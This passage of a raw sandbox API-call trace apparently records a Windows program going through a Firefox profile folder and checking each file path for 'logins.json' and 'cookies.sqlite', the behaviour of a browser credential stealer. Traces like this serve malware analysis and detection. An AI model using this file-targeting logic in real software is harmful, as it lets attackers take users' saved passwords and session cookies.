87 [0161.089] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.089] lstrlenW (lpString="\\") returned 1 [0161.089] GetProcessHeap () returned 0x8e0000 [0161.089] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.089] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.089] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.089] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.089] lstrlenW (lpString="minidumps") returned 9 [0161.089] GetProcessHeap () returned 0x8e0000 [0161.089] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x9254f8 [0161.089] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.089] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.089] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.089] GetProcessHeap () returned 0x8e0000 [0161.089] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.089] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 97 [0161.089] lstrlenW (lpString="") returned 0 [0161.089] GetProcessHeap () returned 0x8e0000 [0161.089] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x9255c8 [0161.089] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.089] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.090] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 97 [0161.090] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 97 [0161.090] lstrlenW (lpString="\\*.*") returned 4 [0161.090] GetProcessHeap () returned 0x8e0000 [0161.090] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.090] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.090] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*.*" [0161.090] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*.*", lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.090] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.090] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.090] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.090] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.090] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0161.090] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0161.090] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.090] GetProcessHeap () returned 0x8e0000 [0161.090] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.090] VirtualQuery (in: lpAddress=0x9255c8, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.090] GetProcessHeap () returned 0x8e0000 [0161.090] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9255c8 | out: hHeap=0x8e0000) returned 1 [0161.090] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.090] GetProcessHeap () returned 0x8e0000 [0161.090] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.090] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.090] lstrlenW (lpString="\\") returned 1 [0161.090] GetProcessHeap () returned 0x8e0000 [0161.090] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.090] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.090] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.090] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.091] lstrlenW (lpString="minidumps") returned 9 [0161.091] GetProcessHeap () returned 0x8e0000 [0161.091] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x9254f8 [0161.091] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.091] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0161.091] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.091] GetProcessHeap () returned 0x8e0000 [0161.091] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.091] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpSrch="logins.json") returned 0x0 [0161.091] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpSrch="cookies.sqlite") returned 0x0 [0161.091] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.091] GetProcessHeap () returned 0x8e0000 [0161.091] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.091] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x80696ec0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="parent.lock", cAlternateFileName="PARENT~1.LOC")) returned 1 [0161.091] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.091] lstrlenW (lpString="\\") returned 1 [0161.091] GetProcessHeap () returned 0x8e0000 [0161.091] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.091] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.091] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.091] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.091] lstrlenW (lpString="parent.lock") returned 11 [0161.091] GetProcessHeap () returned 0x8e0000 [0161.091] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x9254f8 [0161.091] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.091] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="parent.lock" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" [0161.091] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.091] GetProcessHeap () returned 0x8e0000 [0161.091] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.091] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock", lpSrch="logins.json") returned 0x0 [0161.091] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock", lpSrch="cookies.sqlite") returned 0x0 [0161.091] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.091] GetProcessHeap () returned 0x8e0000 [0161.091] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.092] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb43eb830, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb43eb830, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3b3f6e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="permissions.sqlite", cAlternateFileName="PERMIS~1.SQL")) returned 1 [0161.092] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.092] lstrlenW (lpString="\\") returned 1 [0161.092] GetProcessHeap () returned 0x8e0000 [0161.092] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.092] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.092] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.092] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.092] lstrlenW (lpString="permissions.sqlite") returned 18 [0161.092] GetProcessHeap () returned 0x8e0000 [0161.092] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd6) returned 0x9254f8 [0161.092] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.092] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="permissions.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" [0161.092] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.092] GetProcessHeap () returned 0x8e0000 [0161.092] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.092] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite", lpSrch="logins.json") returned 0x0 [0161.092] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.092] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.092] GetProcessHeap () returned 0x8e0000 [0161.092] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.092] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4c1a3d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4c1a3d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x82b58970, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xa00000, dwReserved0=0x0, dwReserved1=0x0, cFileName="places.sqlite", cAlternateFileName="PLACES~1.SQL")) returned 1 [0161.092] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.092] lstrlenW (lpString="\\") returned 1 [0161.092] GetProcessHeap () returned 0x8e0000 [0161.092] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.092] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.092] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.092] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.092] lstrlenW (lpString="places.sqlite") returned 13 [0161.092] GetProcessHeap () returned 0x8e0000 [0161.092] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.092] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.092] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="places.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" [0161.093] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.093] GetProcessHeap () returned 0x8e0000 [0161.093] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.093] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite", lpSrch="logins.json") returned 0x0 [0161.093] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.093] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.093] GetProcessHeap () returned 0x8e0000 [0161.093] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.093] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81fbde30, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x81fbde30, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x81fbde30, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xe14, dwReserved0=0x0, dwReserved1=0x0, cFileName="pluginreg.dat", cAlternateFileName="PLUGIN~1.DAT")) returned 1 [0161.093] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.093] lstrlenW (lpString="\\") returned 1 [0161.093] GetProcessHeap () returned 0x8e0000 [0161.093] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.093] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") 